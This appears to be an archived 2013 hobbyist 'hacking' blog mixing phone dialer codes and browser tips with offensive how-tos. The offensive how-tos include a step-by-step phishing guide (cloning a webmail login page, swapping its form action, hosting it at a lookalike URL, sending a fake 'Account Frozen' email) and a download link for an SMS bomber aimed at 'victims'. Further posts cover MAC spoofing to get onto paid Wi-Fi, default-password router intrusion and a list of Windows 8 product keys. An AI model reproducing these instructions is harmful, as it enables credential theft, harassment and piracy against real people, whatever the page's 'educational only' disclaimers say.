Sunday, 20 January 2013

→ ANDROID LATEST CODES AND HACKS-19 JANUARY 2013
Hello guys,
Good Evening,
Today I am back with latest Android code and hack collection which are very important in our daily Life!!!
I am Going to post all working code!!

Secret codes for Android mobile operating system:
Phone and Battery information Code:
*#*#4636#*#*
Factory Data reset Code:
*#*#7780#*#*
Full Factory Format Code:
*2767*3855# (Dangerous)
GTalk Service Monitor Code:
*#*#8255#*#*
Camera Firmware settings Code :
*#*#34971539#*#*
Service mode Codes:
*#*#197328640#*#*
This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.
WLAN, GPS and Bluetooth Test Codes:
WLAN test (Use"Menu" button to start various tests) :
*#*#232339#*#*
or
*#*#526#*#*
or
*#*#528#*#*
Shows WiFi MAC address :
*#*#232338#*#*
GPS test :
*#*#1472365#*#*
Another GPS test : *#*#1575#*#*
Bluetooth test : *#*#232331#*#*
Shows Bluetooth device address : *#*#232337#*#
Codes to launch various Factory Tests:
Packet Loopback:
*#*#0283#*#*
LCD test :
*#*#0*#*#*
Melody test:
*#*#0673#*#*
or
*#*#0289#*#*
Device test(Vibration test and BackLight test) :
*#*#0842#*#*
Touch screen version :
*#*#2663#*#*
Touch screen test:
*#*#2664#*#*
Proximity sensor test :
*#*#0588#*#*
RAM version :
*#*#3264#*#*
Codes to get Firmware version information:
PDA, Phone, H/W, RFCallDate : *#*#4986*2650468#*#*
PDA and Phone :
*#*#1234#*#*
FTA SW Version :
*#*#1111#*#*
FTA HW Version :
*#*#2222#*#*
PDA, Phone, CSC, Build Time, Changelist number :
*#*#44336#*#*

Tuesday, 15 January 2013

Ethical Hacking


Ethical Hacking

In any site that deals with so many controversial topics and skills, it has become necessary to address a few incidents and implement a user terms and services agreement. We want to provide a free, safe and legal training environment to the users of this site.
What is hackersofudupi.blogspot.com   or  Hackers of udupi?
IT is definitely not a site that promotes or encourages computer hacking (unethical), but rather it is a Computer Security related website. In fact, Computer Hacking and Computer Security are the two concepts that goes hand-in-hand. They are like the two faces of the same coin. So with the existence of close proximity between Hacking and Security, it is more likely that people often mistake our site to be one that promotes Hacking. But in reality, our goal is to prevent hacking. We believe that unless you know how to hack (ethically), you cannot defend yourself from malicious hack attacks.  Know Hacking but No Hacking!

Your usage of this website constitutes your agreement to the following terms.

1. All the information provided on this site are for educational purposes only. The site is no way responsible for any misuse of the information.
2. “PC Hacks”  is just a term that represents the name of the site and is not a site that provides any illegal information. hackspc.com is a site related to Computer Security and not a site that promotes hacking/cracking/software piracy.
3. This site is totally meant for providing information on “Computer Security” “Computer Programming” and other related topics and is no way related towards the terms “CRACKING” or “HACKING” (Unethical).
4. Few articles (posts) on this site may contain the information related to “Hacking Passwords” or “Hacking Email Accounts” (Or Similar terms) are not the GUIDES of Hacking. They only provide information about the legal ways of retrieving the passwords. You shall not misuse the information to gain unauthorised access.
5. The virus creation section on this site  provides demonstration on coding simple viruses using high level programming languages. These viruses are simple ones and cause no serious damage to the computer. However we strongly insist that these information shall only be used to expand programming knowledge and not for causing malicious attacks.
6. All the information on this site are meant for developing Hacker Defense attitude among the users and help preventing the hack attacks. hackspc.com insists that these information shall not be used for causing any kind of damage directly or indirectly.
7. The word “Hack” or “Hacking” that is used on this site shall be regarded as “Ethical Hack” or “Ethical Hacking” respectively.
8. We believe only in White Hat Hacking. On the other hand we condemn Black Hat Hacking.
8. Most of the information provided on this site are simple computer tricks (may be called by the name hacks) and are no way related to the term hacking.
9. Some of the tricks provided by us may no longer work due to fixture in the bugs that enabled the exploits. We are not responsible for any direct or indirect damage caused due to the usage of the hacks provided on this site.
10. The site holds no reponsiblity for the contents found in user comments since we do not monitor them. However we may remove any sensitive information present in the user comments.
11. We reserve the right to modify the Disclaimer at any time without notice.

if you have any doubts pls comment...

$@M

Create A Free Visual Mobile Website


Create A Free Visual Mobile Website

Hey,would like to make your own mobile website??? Now here is a great offer for you. Just use the given below trick and get unlimited bandwidth and unlimited hosting for your mobile website. You will also get a free subdomain(you can choose from a list). Also you will be provided with a free site builder that can even be updated from your mobile phone. You can customize your websites with templates readily available. Its totally free to use. You can also add your own ads in your website. You can upload unlimited files and you can even make unlimited number of pages. You can add any script like php,java etc… you can also add css effect to your pages. ….. so what to wait? Just follow these steps and get a free (totally free) mobile website .
Go to xtgem.com


Click on ‘start building’


Session Hijacking


What Exactly is Session Hijacking in Hacking [Tutorial]


Session hijacking is widely used method by hackers for temporarily stealing network connections or login sessions. You might have heard this term used a lot by hackers .

What is Session
We see lot of Wireless network services offering us to use Wi Fi based on pay per use model – where you have to pay for usage and it costs really high but gives you high speed connectivity.
Evry user that pays for the service get connected. A unique MAC address of his laptop/netbook is stored in Service providers database for every paid user. Every time he gets connected to the paid network it creates a session and Session ID.
Every other user do not having authenticated MAC address and Session gets no connectivity. So this unique connection between user & wireless connectivity provider is session.
Black hat hackers have been using this technique from a long time to get unauthorized access to Paid Wi Fi network.
What is Session Stealing
In session hijacking we create a fake MAC address on our network interface & replace it with original one that we have by using MAC changer utility. And the fake MAC address that we are using is of certain user who is on the network &has already paid the wireless network usage.
So we spoof the MAC address & let network determine us through his MAC address as authenticated user. This is what we call Session Stealing or Hijacking.

for any queries about this please comment..

$@M

BOMB  MOBILE   PHONE WITH SMS :   BEAVER'S SMS BOMBER PRO

This program will bomb the victim's mobile phone with tons of SMS. It supports all major networks around the world. But if your network is not in the list, then don't worry, you can also add the carrier network with the help of "custom" option. You can also load list of multiple victims and bomb them simultaneously. The improvement that Beaver has made in this version over his previous SMS Bomber is that you can spoof the email address from which you are bombing the victim's mobile phone. For Example, If there was an error sending the message, it will ask you if you wanna change the E-mail/Password you are using. All credits to Beaver for this nice program

Download here. http://www.mediafire.com/download.php?zmd4mtbmtol%20

for any queries pls ask...

$@M

How to boost firefox Browsing Speed...


How To Boost FireFox Browsing Speed Using SpeedyFox - Increase Mozilla FireFox Speed in Windows -  


How To Increase Speed 


1. First You Need To Download Speedyfox So Click Here For Download Speedyfox.

Monday, 14 January 2013


Get IP address from mail ID


Now i am gonna just tell you, how easy it is to find the IP address of the person who has sent a mail in Yahoo.

(The information is meant only for security use and any misuse can be liable to punishment)

* Login to your account and Open the mail.

* On the right-top corner, click Options ==> Select "Standard Headers".

* There you are with all the ip addresses of the person who sent you the mail.

Check the ip address aside to the from:

But the mail sometimes may not come directly from his/her pc. Inorder to deviate the user the mail is passed through many gateways and then finally sent. And to trace out the IP address in such a case find the last "From :" and check the IP there.

Best Unique Nokia secret Hack codes


Best Unique Nokia secret Hack codes

Hey friends, today i will share with you the best Best Nokia hack codes/ These codes provide some interesting and unique information to Nokia Phone users, some of these codes unlock hidden functions. Secret hacks code are mainly beneficial in knowing your device properly. What else you can do just from calling and messaging from your mobiles. If you wish to unlock your Nokia Phone then read this article: Unlock Nokia Phone.
Note:Not all Nokia phones support all codes, so please don't complain if any of the hack code doesn't work on your mobile device.

Universal Nokia Hack Codes
These are called universal because these hack codes works on almost all Nokia mobile phones.
*#06#     Displays the IMEI (Standard GSM command, works on all phones)
Information you get from the IMEI-

XXXXXX  XX   XXXXXX   X
    TAC       FAC     SNR      SP
*TAC = Type approval code
*FAC = Final assembly code
*SNR = Serial number
*SP    = Spare
*#0000#      Displays the firmware version and date
Information you get from the Software revision-
V 6.1.0.5
18-12-10
NSE-3

*1ST Line  = Software revision
*2ND Line = The date of the software release
*3RD Line = Phone type
*#92702689# *#war0anty#  Here you can view the S/N and the IMEI as well as the life timer (newer models). The date the phone left the factory and the date it was purchased. If your phone has been repaired the date of the repair is also visible. You will need to turn the phone off to exit this menu. Newer phones simply require you to press ok.

ClockStopping
To check weather your SIM Card supports clock stopping type-*#746025625# (*#SIM0CLOCK#)

NOKIA 40 SERIES CODES
The following codes are specific to older series Nokia(40 series) Mobile phones:
Entering the following codes will restart the phone.
Note: If main code doesn't work try the alternate one given in brackets for each code. As on some devices standard code works and in some alternate only might work.
*4720# (*hra0#) Activates Half Rate, Half Rate is 5.6kbit/s and uses half the bandwidth at the cost of call quality. Network operators often activate half rate on overloaded towers during peak times to save costs.
#4720# (#hra0#) Deactivates Half Rate
*3370# (*efr0#) Activates Enhanced Full Rate, EFT attempts to match wire quality. The calls are 12.2kbit/s and are not supported by all operators. It is compatibale with the hightest AMR mode.
#3370# (#efr0#) Deactivates Enhanced Full Rate
*#746085685# (*#sim0clock#) Display the SIM clock status
Phone Specific Codes: 
The following codes are phone specific or phase related.
*#7220# (*#pca0#) Activate the GPRS PCCCH support (Packet Common Control Channel)
*#7230# (*#pcd0#) Deactivate the GPRS PCCCH support
*#7760# (*#ssn0#) Display the manufacturing serial number
This only works on the 3310 and 3330:
*#67705646# (*#opr0logo#) Clear the operator logo, the logo will be reset to the default network operator logo.

NOKIA 60/80 SERIES CODES
The following codes work on newer series 40 & series 60/80 phones:
*#2820# (*#bta0#) Display the Bluetooth MAC address (Phone must have a built in bluetooth adapter)
*#7370925538# (*#res0wallet#) Reset the mobile wallet (Phone must have the mobile wallet feature)
*#7370# (*#res0#) Soft-format the memory (Symbian)
*#7780# (*#rst0#) Reset to factory defaults, confirmation required (also known has a Hard-format), all phone contents will be wiped clean including contacts and smses if they are stored on the phone.
I hope you all have enjoyed these Secret hack codes. If you have any doubt ask in form of comments...

by $@M

Reactions:







hack gmail password


Trick To Hack Email ID And Password


Here I provide you the procedure you need to follow to hack a gmail ID.


1.At first you need to open the website of the email id hoster(say gmail,yahoomail,hotmail etc. For eg. If the email ID is username@gmail.com you need to open www.gmail.com)
2.After opening the hoster website click inside the website once and press 'CTRL+U', you will be provided with a popup window from your browser in which the source code of the gmail website exists.
3.Copy the source code from the pop u window.(you can use 'CTRL+A" to select the code and 'CTRL+C' to copy it).
4.Open NOTEPAD and paste the source code you copied from the popup window.
5.Save it as goharshhackers.html.
6.Now in the file you saved find a code line starting from (this is the code which is related to yahoo,for other sites find code starting with and having string as (form method="post" action="xxxxxxxxxxxxx"))
7.Replace the (form method="post" action="xxxxxxxxxxxxx") code by the the following code after placing your form id:

Now save the goharshhackers.html file again.


Procedure:
Here I provide you the procedure you need to follow to 'hack a gmail ID':

1.At first you need to open the website of the email id hoster(say gmail,yahoomail,hotmail etc. For eg. If the email ID is username@gmail.com you need to open www.gmail.com)

2.After opening the hoster website click inside the website once and press 'CTRL+U', you will be provided with a popup window from your browser in which the source code of the gmail website exists.

3.Copy the source code from the pop u window.(you can use 'CTRL+A" to select the code and 'CTRL+C' to copy it).

4.Open NOTEPAD and paste the source code you copied from the popup window.

5.Save it as goharshdotcom.html.

6.Now in the file you saved, find a code line starting from
action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form"> (this is the code is related to yahoo,for other sites find code starting with and having string as (form method="post" action="xxxxxxxxxxxxx"))

7.Replace the (form method="post" action="xxxxxxxxxxxxx") code by the the following code after placing your Form ID:
Your Form ID Here" method="post" enctype="application/x-www-form-urlencoded" onsubmit="return New_Form_CF();">

8.Now save the goharshdotcom.html file again.


This finishes your preparation. If you want to hack a victim's user-name and password,the Victim has to login to his/her account through the page embedded with the code you saved.(I will explain the trick on how to make someone login from your page in the last paragraph of this article)

To create a web page, to make them login from your page You need to upload your saved goharshdotcom.html to a free hosting website (you can read our 'Guidelines to create a website for free' article to know how to create a website for free and the list of guinine free website hosters).
Now select your site name as yourmail.yahooo.com/support or email.yahoo.com/support or some other format from which the victim can be convinced to visit for login.

You can add lots of unrelated letters in the URL(for example mail.yahoo.com/support/EhnTuhdEWsh_SECURELOGIN or you can even impress the victim if he/she donot have much knowledge about internet by a simple url like www.GmailloginSECURELOGIN.webs.com -which you can obtain for free) as mail.yahoo.com/support URL will no longer available for registering.You can also add some rubbish numbers and make is very long so that the victim wont see the name of webhost in the link you provide.

Create a fake mail like support_yahoo@yahoo.com (like Support.googleforyou@gmail.com etc if victim's id is of gmail) and send a mail to the victim to his email id stating "Account Frozen" and in the mail write "Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen".

After reading this the victim clicks on the link and enter his ID and password. but as soon as this happens, as you have given the redirecting URL as the URL of the site itself it will go to the login page again after he click submit.The victim will think that he might have entered a wrong password so that the page reloaded again(As it usually happens while we login through any other website)but in reallity the username and password will been sent to your email account you specified and the victim will still not knowing that his account has been hacked.

Warning :
"This Hacking trick is just to make you aware of Phishing. And it is just a small contribution from us to make our Readers aware of these things. Please do not use this trick to get someone's personal data,Which is illegal. Using this just to fool your friends is left to you and your friend but if you get caught We do not bear any responsibility.If you find anybody adopting this trick to steal your data, Contact me for the solution."
Thank you,
HOW TO HACK GMAIL PASSWORD

Sunday, 13 January 2013



WINDOWS 8 KEYS FOR DIFFERENT VERSION



IMP notes
pls  try to do in without internet connection  & to make it more useful try it during  u r first installation of windows  8


 Professional=NG4HW-VH26C-733KW-K6F98-J8CK4
 Professional = XKY4K-2NRWR-8F6P2-448RF-CRYQH

 Retail key  Professional WMC = RR3BN-3YY9P-9D7FC-7J4YF-QGJXW 

 Retail  key  for Windows Media Center
 Core=BN3D2-R7TKB-3YPBD-8DRP2-27GG4
 Core = FB4WR-32NVD-4RW79-XQFWH-CYQG3 

 Retail key  Enterprise=32JNW-9KQ84-P47T8-D8GGY-CWCK7
 EnterpriseN=JMNMF-RHW7P-DMY6X-RF3DR-X2BQT

Microsoft Windows 8 Default key's:
 EnterpriseNEval =NF6DY-GHWQP-DPPBG-C32P2-DC73K

 CoreARM =6D4CN-WMGRW-DG8M6-XX8W9-3RPT8

 EmbeddedIndustryA =NXCTR-YXXWC-TK368-HGGTF-8YB99

 EmbeddedE =29QNM-D667Q-9Q86B-Q93MQ-4F92H

 CoreSingleLanguage =XBRND-QDJTG-CQJDB-7DRBW-RX6HB

 EmbeddedAutomotive =J2ND2-BCW98-8669Y-HPBF3-RDY99

 Professional =XKY4K-2NRWR-8F6P2-448RF-CRYQH - Retail key

 ServerStorageStandard =RD9XF-6N3MC-2P2R3-MK2WX-C7GCW

 ServerStorageWorkgroup =NYGPD-KK4W6-QC3XH-HX4P4-2J824

 ServerStandardEval =QYVMN-YJ96P-79PM8-DMFC2-7CBTX

 Starter =C3PVB-FNPQD-WR76V-FBYR7-PDG4W

 ServerSolution =N4PDW-9PKPK-29XQJ-42MFM-CWCQ8

 Embedded =MRPNR-JMHVH-DJYWH-TV7BT-72W4D

 EmbeddedIndustryAE =VQ7FC-RTNC8-RHDFR-8THVR-J633X

 ServerDatacenterEval =BJ67Q-FCN4J-82CXY-8HHQG-YG69T

 EmbeddedIndustry =3HDCN-87G3V-FPCDF-C6HTB-79Q3X

 Core =FB4WR-32NVD-4RW79-XQFWH-CYQG3

 Enterprise =8M9BN-YB7W9-YV3VJ-7WMGG-MKH3V

 EnterpriseEval =NXHGK-GRJQH-K7WVV-MTXP3-YBFDM

 ServerHyperCore =Q8R8C-T2W6H-7MGPB-4CQ9R-KR36H

 ThinPC =G3KNM-CHG6T-R36X3-9QDG6-8M8K9

 ServerWinFoundation =PN24B-X6THG-274MF-YHM9G-H8MVG

 ServerStandard =VN93G-8PVT3-W2X3H-F3X87-FJMTW

 CoreN =VDKYM-JNKJ7-DC4X9-BT3QR-JHRDC

 ServerMultiPointStandard =32TNQ-HMFWQ-8R933-X6VYY-WHRFX

 ServerDatacenterCore =2GMNX-8K7D2-X968C-7P62F-8B2QK

 ServerWeb =KN7PC-CJ492-TRM7Q-YY4R4-JHQMC

 EmbeddedIndustryE =9VKDN-FDY34-HGK3H-TCC66-8TV98

 ProfessionalN =BHHD4-FKNK8-89X83-HTGM4-3C73G

 StarterN =744NM-C4FXY-YGM8B-7MVJC-BBFB9

 CoreCountrySpecific =XYNVP-TW798-F8893-7B89K-8QHDK

 ServerMultiPointPremium =CBR2N-2HG39-2TGGT-GQB27-46V47

 ProfessionalWMC =RR3BN-3YY9P-9D7FC-7J4YF-QGJXW 

 Retail  Key for Windows Media Center

 ServerDatacenter=2GMNX-8K7D2-X968C-7P62F-8B2QK

 ServerStorageStandardEval=XNK3M-8V77Q-DC829-HW3Y9-GJCPY

 EmbeddedA=9N28G-7WY7K-RMMD4-9J4BY-WHRJG

 ServerStorageWorkgroupEval=G8PN6-MRB2V-34CDP-3838W-BWMTV

 EnterpriseN=NCVKH-RB9D4-R86X8-GB8WG-4M2K6

 ServerStandardCore=VN93G-8PVT3-W2X3H-F3X87-FJMTW

 gvlkCoreARM=DXHJF-N9KQX-MFPVR-GHGQK-Y7RKV

 gvlkServerStandard=XC9B7-NBPP2-83J2H-RHMBY-92BT4

 gvlkCoreN=8N2M2-HWPGY-7PGT9-HGDD8-GVGGY

 gvlkServerMultiPointStandard=HM7DN-YVMH3-46JC3-XYTG7-CYQJJ

 gvlkCoreSingleLanguage=2WN2H-YGCQR-KFX6K-CD6TF-84YXQ

 gvlkServerDatacenterCore=48HP8-DN98B-MYWDG-T2DCC-8W83P

 gvlkProfessional=NG4HW-VH26C-733KW-K6F98-J8CK4  

 volume key gvlkProfessionalN=XCVCF-2NXM9-723PB-MHCB7-2RYQQ

 gvlkCoreCountrySpecific=4K36P-JN4VD-GDC6V-KDT89-DYFKP

 gvlkServerMultiPointPremium=XNH6W-2V9GX-RGJ4K-Y8X6F-QGJ2G

 gvlkProfessionalWMC=GNBB8-YVD74-QJHX6-27H4K-8QHDG

 Volume key for Windows Media Center
 gvlkServerDatacenter=48HP8-DN98B-MYWDG-T2DCC-8W83P

 gvlkEnterpriseN=JMNMF-RHW7P-DMY6X-RF3DR-X2BQT

 gvlkEnterprise=32JNW-9KQ84-P47T8-D8GGY-CWCK7

 gvlkCore=BN3D2-R7TKB-3YPBD-8DRP2-27GG4

 gvlkServerStandardCore=XC9B7-NBPP2-83J2H-RHMBY-92BT4

Hacking ADSL Routers for free accounts


Most of the people never change their default passwords no matter what it is, they don't change them because they think that they are safe. In this tutorial I'll show you one of the ways how to use this mistake and get free ADSL/Wireless (If wireless router is used) accounts and enjoy in unlimited downloads.

First we will download the necessary tools:

1.) XPass
2.) Angry IP Scanner v3.0.4 Beta
3.) If you don't have Java installed, download and install it here: JAVA

You will also need to have version 8 OR older of Internet Explorer.


How to hack a Mobile Number And Make Prank Calls 2013


Hiii friends THis Is Mohammad Samheel and in this article I will teach you How to hack a Mobile Number And Make Prank Calls With the Help of Crazy Calll

What is phishing and how to be safe from phishing ?




    What is Phishing ?

                    Phishing is one of the type of hacking . It is a method of acquiring sensitive information such as username, password, bank information etc. Phishing pagecould be saif as an duplicate page of real one. Its look exactly similar as the real page.But when user enter sensitive information on such phishing page his information is send to the E-mail address provided in the phishing page or you can say the one who created that phishing page. Phishing page is mostly send via mail.

Keyboard Shortcuts for Facebook !!



                  Facebook is one of the most famous social networking site where most of us spend lots of our time. So here are some usefull keyboards shortcuts for Google chrome and Mozilla Firefox users


         

Mozilla Firefox


  • Shift+Alt+1: View your News Feed
  • Shift+Alt+2: View your own Profile
  • Shift+Alt+3: View pop-up of friend requests
  • Shift+Alt+4: View pop-up of messages
  • Shift+Alt+5: View pop-up of notifications
  • Shift+Alt+6: View Account Settings
  • Shift+Alt+7: View Privacy Settings
  • Shift+Alt+8: View Facebook’s own profile
  • Shift+Alt+9: Read latest Terms of Service agreement.
  • Shift+Alt+0: Open Facebook Help Center
       

Google Chrome

  • Alt+1: View your News Feed
  • Alt+2: View your own Profile
  • Alt+3: View pop-up of friend requests
  • Alt+4: View pop-up of messages
  • Alt+5: View pop-up of notifications
  • Alt+6: View Account Settings
  • Alt+7: View Privacy Settings
  • Alt+8: View Facebook’s own profile
  • Alt+9: Read latest Terms of Service agreement.
        $@M

Index Labels